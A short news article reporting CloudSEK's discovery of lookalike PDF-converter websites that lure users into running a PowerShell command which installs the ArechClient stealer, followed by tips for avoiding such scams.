Millions rely on free PDF-to-DOCX converters for quick file format changes—but cybercriminals are now exploiting this convenience. According to cybersecurity firm CloudSEK, malicious actors are creating counterfeit file conversion websites that mimic legitimate platforms to deploy data-stealing malware.
The attack, revealed shortly after a warning from the FBI, involves fake websites that closely resemble trusted services such as pdfcandy.com. These lookalike domains—like candyxpdf.com and candyconverterpdf.com—replicate official branding and user interfaces, including logos and animated progress indicators, to deceive users.
Once users attempt to convert a PDF file, they’re presented with a captcha screen to further build trust. However, the danger lies just beyond this point. Victims are prompted to execute a PowerShell command that downloads a malicious ZIP file named adobe.zip. Inside is ArechClient, a trojan linked to the SectopRAT family—active since 2019 and capable of harvesting browser credentials, crypto wallet data, and other sensitive information.
Though some of these malicious sites have been removed, they reportedly attracted over 6,000 visits last month alone—highlighting the effectiveness of the ruse and the widespread risk it poses.
How to Protect Yourself:
- Verify URLs: Always double-check domain names to ensure you’re using the official website.
- Avoid Suspicious Prompts: Never run system commands or download files prompted by online tools.
- Use Offline Alternatives: For sensitive documents, use trusted offline software to handle file conversions.
- React Quickly: If you suspect infection, disconnect affected devices and change all important passwords immediately.
As digital tools become more widespread, it’s crucial to stay vigilant against evolving cyber threats disguised as everyday utilities.
